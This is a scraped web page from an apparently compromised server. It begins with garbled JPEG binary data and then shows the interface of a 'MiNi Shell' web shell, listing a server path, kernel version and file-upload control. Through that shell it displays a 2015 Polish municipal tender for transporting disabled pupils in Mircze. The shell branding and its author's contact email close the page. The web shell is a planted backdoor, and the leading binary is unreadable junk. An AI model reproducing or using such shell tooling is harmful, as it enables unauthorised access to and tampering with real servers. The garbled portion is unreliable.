JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150708/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150708/169916-N-2015.html

<p class="kh_header"><b>Mircze: Dowóz uczniów niepełnosprawnych.</b><br>
<b>Numer ogłoszenia: 169916 - 2015; data zamieszczenia: 08.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Zespół Ekonomiczno-Administracyjny Szkół w Mirczu , ul. Kryłowska 20, 22-530 Mircze, woj. lubelskie, tel. 084 6519094, faks 084 6519015.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów niepełnosprawnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1 Przedmiotem zamówienia jest dowóz dzieci niepełnosprawnych z miejsca zamieszkania do Powiatowego Zespołu Placówek Szkolno - Wychowawczego w Hrubieszowie oraz do funkcjonującego przy nim Niepublicznego Przedszkola Specjalnego Mamy Siebie, Hrubieszów, ul. Zamojska 16 A, a także do Samorządowego Zespołu Szkół w Mirczu, Mircze ul. Kryłowska 27  wraz z powrotem do miejsc zamieszkania.
1.2 Okresy wykonywania:
1.2.1 Uczniowie do Powiatowego Zespołu Placówek Szkolno - Wychowawczych w Hrubieszowie oraz Samorządowego Zespołu Szkół w Mirczu dowożeni będą w dni zajęć szkolnych określonych  zgodnie z kalendarzem roku szkolnego ustalonym na podstawie rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002r. w sprawie organizacji roku szkolnego ( Dz. U. z 2002r. Nr 46, poz. 432 z późn. z późn. zm.).
1.2.2 Dzieci do  Niepublicznego Przedszkola Specjalnego Mamy Siebie, w okresie 1 wrzesień 2015 r. - 24 czerwiec 2016 r. będą dowożone w dni zajęć szkolnych określonych zgodnie z kalendarzem roku szkolnego, a w miesiącu sierpniu 2015 i 2016 r. we wszystkie dni robocze.
1.3 Ilości dzieci dowożonych do poszczególnych placówek przedstawiają się następująco:
1.3.1 Do Powiatowego Zespołu Placówek Szkolno- Wychowawczych w Hrubieszowie dowożeni będą  uczniowie z następujących miejscowości: Prehoryłe 1 - dziecko, Małków Kolonia - 1 dziecko, Mircze - 1 dziecko poruszające się na wózku inwalidzkim, Wiszniów - 1 dziecko,  Borsuk - 1 dziecko, Miętkie - 1 dziecko, Modryń Kolonia - 1 dziecko. 
1.3.2 Do Samorządowego Zespołu Szkół w Mirczu dowożeni będą uczniowie z następujących miejscowości: Radostów - 1 uczeń poruszający się na wózku inwalidzkim.
1.3.3 Do Niepublicznego Przedszkola Specjalnego Mamy Siebie w okresie 1 wrzesień 2015 r.  - 24 czerwiec 2016 r. dowożone będą dzieci z następujących miejscowości:  Kolonia Kryłów - 1 dziecko, Mircze - 1 dziecko, Smoligów - 1 dziecko, Modryń - 1 dziecko.
1.3.4 Do Niepublicznego Przedszkola Specjalnego Mamy Siebie w sierpniu 2015 r. dowożone będą dzieci z następujących miejscowości:  Małków Kolonia - 1 dziecko, Smoligów - 1 dziecko, Modryń - 1 dziecko.
1.3.5 Do Niepublicznego Przedszkola Specjalnego Mamy Siebie w sierpniu 2016 r. dowożone będą dzieci z następujących miejscowości:  Mircze - 1 dziecko, Smoligów - 1 dziecko, Modryń - 1 dziecko.
1.3.6 Dziecko z miejscowości Wiszniów dowożone będzie tylko w pierwszy dzień zajęć lekcyjnych w danym tygodniu, a odwożone w ostatni dzień zajęć lekcyjnych w danym tygodniu.
1.4  Trasa dowozu będzie przebiegała w znacznej części drogami utwardzonymi - asfaltowymi bądź cementowymi.
1.5 Długość tras przedstawia się następująco:
1.5.1 W terminie 1 wrzesień 2015 r. - 24 czerwiec 2016 r., t.j. w okresie w którym dowożone będą dzieci do wszystkich placówek, zakłada się że dzienna długość trasy wyniesie 181 km., za wyjątkiem dnia w którym odwożone będzie również dziecko z Wiszniowa. W tym dniu długość trasy wyniesie 186 km. W dniu w którym dziecko z Wiszniowa będzie tylko dowożone do szkoły długość trasy wyniesie 181 km.
1.5.2 W sierpniu 2015 dzienna długość trasy wyniesie 72 km.
1.5.3 W sierpniu 2016 r. dzienna długość trasy wyniesie 58 km.
1.6 Przyjmuje się że całość zamówienia realizowana będzie przez 229 dni. Przez 42 dni będzie odwożone dziecko z Wiszniowa i w te dni trasa wyniesie 186 km. Przez 21 Będą dowożone dzieci do przedszkola specjalnego w miesiącu sierpniu 2015 r. i w te dni długość trasy wyniesie 72 km. Przez 22 dni będą dowożone dzieci do przedszkola specjalnego w miesiącu sierpniu 2016 r. i w te dni długość trasy wyniesie 58 km.
1.8 Przewidywana łączna ilość kilometrów potrzebnych do realizacji całości  zadania wynikająca z liczby dni zajęć szkolnych i przedszkolnych oraz dziennej długości  tras  wynosi 36664  km.
1.9 Dowóz we wszystkie dni rozpoczynał się będzie nie wcześniej niż o godzinie 6:45. Uczniowie do Powiatowego Zespołu Placówek Szkolno - Wychowawczych w Hrubieszowie i Niepublicznego Przedszkola Specjalnego Mamy Siebie powinni być dowiezieni na godzinę 8:00, nie wcześniej jednak niż na godzinę 7:45. Uczeń do Samorządowego Zespołu Szkół w Mirczu powinien być dowieziony na godzinę 8:00, nie wcześniej jednak niż na 7:30.
1.10 Odwóz z Powiatowego Zespołu Placówek Szkolno - Wychowawczych w Hrubieszowie i Niepublicznego Przedszkola Specjalnego Mamy Siebie będzie się rozpoczynał o godzinie 14:30, a z Samorządowego Zespołu Szkół w Mirczu o godzinie 13:30.
1.11 Odwóz dzieci dowożonych do  Niepublicznego Przedszkola Specjalnego Mamy Siebie w sierpniu 2015 i 2016 r. będzie się rozpoczynał o godzinie 13:00.
1.12 W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem jazdy ustalonym przez Zamawiającego.
1.13 Pojazd powinien być wyposażony w siedzenia z  pasami trzypunktowymi oraz windę lub szyny najazdowe, sprawnym technicznie i dopuszczonym do ruchu według obowiązujących przepisów w ruchu pasażerskim i transporcie drogowym oraz właściwie do charakteru przewozów oznakowanym.
1.14 W przypadku braku windy lub szyn najazdowych umieszczenie dziecka niepełnosprawnego w pojeździe zapewni obsługa pojazdu.
1.15 Wykonawca odpowiada za przewóz uczniów na zasadach obowiązujących w przepisach o ruchu pasażerskim, transporcie drogowym i określonych prawem przewozowym. Kierowca powinien posiadać odpowiednie uprawnienia zawodowe. 
1.16 W czasie trwania przewozu uczniów Wykonawca zapewni opiekę w postaci osoby przeszkolonej w zakresie udzielania pierwszej pomocy bądź posiadającej przygotowanie pedagogiczne pozwalające na pracę z  dziećmi niepełnosprawnymi. Opieka nie może być zapewniona tylko przez samego kierowcę..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Rok produkcji pojazdów wykorzystywanych do wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy. Zmiany Umowy będą mogły nastąpić w  następujących przypadkach:
1.1 Zmiany liczby uczniów objętych dowozem;
1.2 Zmiany godzin wykonywania przewozu;
1.3 Zmiany miejscowości z których będą dowożeni uczniowie. 
1.4 Zmiany ilość dni wykonywania przewozu określonej w rozdziale III niniejszej specyfikacji.  
1.5 Wszelkie zmiany które spowodują wydłużenie bądź skrócenie trasy przewozu a także wpłyną na zmianę ilości dni wykonywania przewozu, spowodują zmianę kwotę wynagrodzenia przewoźnika, która to zmiana stanowić będzie iloczyn stawki jednostkowej za kilometr i ilości przejechanych bądź nie przejechanych kilometrów.
2. Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażonej na piśmie pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugmircze.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespół Ekonomiczno - Administracyjny Szkół w Mirczu
ul. Kryłowska 20
22-530 Mircze
pok. 108 Urzędu Gminy Mircze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2015 godzina 10:00, miejsce: Gminny Zespół Ekonomiczno - Administracyjny Szkół w Mirczu
ul. Kryłowska 20
22-530 Mircze
pok. 108 Urzędu Gminy Mircze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com